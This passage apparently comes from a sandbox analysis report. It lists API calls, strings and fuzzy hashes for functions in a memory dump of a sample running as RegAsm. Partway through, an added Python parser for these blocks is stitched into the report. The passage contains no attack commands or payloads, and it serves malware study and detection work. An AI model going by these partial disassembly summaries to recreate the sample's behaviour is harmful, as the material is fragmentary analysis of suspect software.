                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
• Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
• Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
• Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
• Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
• Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4019544885-1856150674
• Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
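Added example, not code from this report or from Joe Sandbox: a small Python parser for the per-function blocks above, so the call lines, their "Part of subcall function" attributions, String IDs and fuzzy hashes can be loaded as records and pivoted on (which functions reach memset, which record carries a given Instruction Fuzzy Hash) instead of being read by eye. The two regexes encode the layout as rendered on this page and are an assumption, not an official schema; SAMPLE is abridged from three of the page's own entries.

```python
"""Parser for Joe Sandbox 'IDA Plugin' function summaries.

Added example, not code from the report or from Joe Sandbox. The regexes
encode the rendered layout seen on this page (an assumption, not an
official schema). SAMPLE is abridged from three of the page's own entries.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

# "• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7"
# "• _strlwr.MSVCRT ref: 0040C15F"
# "• Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647"
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# "• Instruction Fuzzy Hash: 67318F75..."  or  "• String ID:" (empty value)
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*?)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int                       # call-site address from "ref:"
    subcall_of: int | None = None  # set when the call sits in a listed callee


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> list[str]:
        return [c.name for c in self.calls if c.subcall_of is None]


def parse_records(text: str) -> list[FunctionRecord]:
    """One record per 'APIs' block; metadata bullets attach to the open record."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = CALL_RE.match(line)
        if m:
            if cur is None:  # excerpt that starts mid-record (no "APIs" header)
                cur = FunctionRecord()
                records.append(cur)
            args = tuple(m["args"].split(",")) if m["args"] else ()
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
            continue
        m = META_RE.match(line)
        if m and cur is not None:
            cur.meta[m["key"]] = m["val"]
    return records


def records_calling(records, api: str, include_subcalls: bool = False):
    """Pivot: functions that reach an API in their own body (or via listed callees)."""
    return [r for r in records
            if any(c.name == api and (include_subcalls or c.subcall_of is None)
                   for c in r.calls)]


def api_histogram(records) -> Counter:
    return Counter(c.name for r in records for c in r.calls)


def by_fuzzy_hash(records) -> dict[str, FunctionRecord]:
    """Index on Instruction Fuzzy Hash, the field used to pivot across samples."""
    return {r.meta["Instruction Fuzzy Hash"]: r
            for r in records if "Instruction Fuzzy Hash" in r.meta}


# Abridged copy of three entries from this page (same text, fewer lines).
SAMPLE = """\
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• GetTickCount.KERNEL32 ref: 0040610B
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
• String ID: 4$h
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
• String ID: strings
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.meta.get("String ID", ""), rec.direct_apis())
    print(api_histogram(parse_records(SAMPLE)).most_common(3))
```

Keep `subcall_of` in mind when pivoting: the memset at 0040D639 belongs to the callee at 0040D626, so `records_calling(recs, "memset")` returns only the file-reading record unless `include_subcalls=True` is passed; a detection rule that keys on "function X calls memset" should be written against the direct list.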
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                                                  • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                                                  • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
• Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658

APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D

Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
• Instruction ID: b13963ca7945f00a157482356cff4617054a50a9c2c324265242a4647e6472cc
• Opcode Fuzzy Hash: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
• Instruction Fuzzy Hash: 7531D230600300DBDB20DF15CD89BDA37B5BB40314F00817AEA689B2E2D7B99ED1CB18

APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248

Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
• Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
• Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
• Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98

APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159

Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
